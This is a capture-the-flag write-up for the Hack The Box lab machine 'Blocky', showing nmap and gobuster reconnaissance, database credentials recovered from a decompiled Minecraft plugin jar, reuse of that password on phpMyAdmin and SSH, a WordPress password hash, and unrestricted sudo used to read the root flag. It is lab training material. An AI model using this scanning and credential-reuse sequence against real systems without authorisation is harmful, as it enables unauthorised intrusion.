Contents

🕵 HTB-Writeup : BLOCKY

Recon

Nmap scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# basic scan
nmap -sC -sV -p- -T5 10.10.10.40

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We found multiple ports open. On port 80, we are facing a wordpress site.

Directories listing

With gobuster we list website directories.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
gobuster -u http://blocky.htb -w ~/CTF/TOOLS/wordlist/gobuster-wordlist.txt -t 10

=====================================================
2022/07/24 22:34:48 Starting gobuster
=====================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/index.php (Status: 301)
/wp-admin (Status: 301)
/license.txt (Status: 200)
/wp-cron.php (Status: 200)
/wp-load.php (Status: 200)
/wp-links-opml.php (Status: 200)
/wp-blog-header.php (Status: 200)
/wp-login.php (Status: 200)
/wp-mail.php (Status: 403)
/wp-trackback.php (Status: 200)
/.htaccess (Status: 403)
/wp-config.php (Status: 200)
/wp-signup.php (Status: 302)
/wp-activate.php (Status: 302)
/plugins (Status: 301)
/javascript (Status: 301)
/wiki (Status: 301)
/phpmyadmin (Status: 301)
/.htpasswd (Status: 403)
/.htpasswds (Status: 403)
=====================================================

We found multiple interesting links:

  • /phpmyadmin: a phpmyadmin login page;
  • /wp-login.php: another login page;
  • /plugins: a plugins directory containing 2 jars.

I manage first to try to decompile jars using jd-gui.

On the first jar I found a class containing credentials:

1
2
3
4
5
6
7
8
public class BlockyCore {
  public String sqlHost = "localhost";
  
  public String sqlUser = "root";
  
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
// ...
}

Exploit

I try first to connect on the http://blocky.htb/wp-login.php login page with those creds. I was unable to connect.

Then, I manage to login with those credential on the phpmyadmin service. It works!

In the wordpress database, we can found user Notch and his password hash $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/. I try to bruteforce the password but in vain…

After some time (lost lol), I tried to connect to the server with SSH. First with root:8YsqfCTnvxAUeduzjNSXe22 creds, unsuccessfully. Then, with notch:8YsqfCTnvxAUeduzjNSXe22 creds. It works !

We first list commands that can be run in sudo with the user:

1
2
3
4
5
6
7
notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

uhh, the user can run all commands with root rights, we can simply sudo cat the root flag.

1
2
notch@Blocky:~$ sudo cat /root/root.txt
40913aeae***********************